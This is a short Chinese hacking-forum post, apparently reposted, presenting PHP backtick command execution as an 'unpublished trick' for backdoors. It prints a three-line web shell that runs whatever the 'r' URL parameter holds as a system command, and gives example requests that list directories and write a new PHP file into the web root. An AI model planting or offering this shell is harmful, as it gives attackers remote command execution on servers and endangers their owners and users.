一个官方没有公布的php秘籍，可被用作后门 - 网

发现这个也是巧合，我就直接说了吧   <?php//t.php $test = $_GET['r']; echo `$test`; ?>大家看看这个代码有木有问题？   我想大家都会说没有问题，但是细心的朋友也会发现下面的变量被一个符号包起来了，既然是变量为什么要这样了，   而且又不是单引号，这个就是关键所在了，这个符号是Esc 下面的一个键 感叹号！旁边的，   通过echo `系统命令`; 可以达到system(); 一样的效果   如果不信的朋友可以测试   http://www.2cto.com /t.php?r=dir 可以列出目录   http://www.2cto.com /t.php?r=echo 我是马儿  >>D:\web\expsec.php   大家觉得我没有忽悠 就赏点分哈   from：http://www.90sec.org/thread-1592-1-1. html

查看更多关于一个官方没有公布的php秘籍，可被用作后门 - 网的详细内容...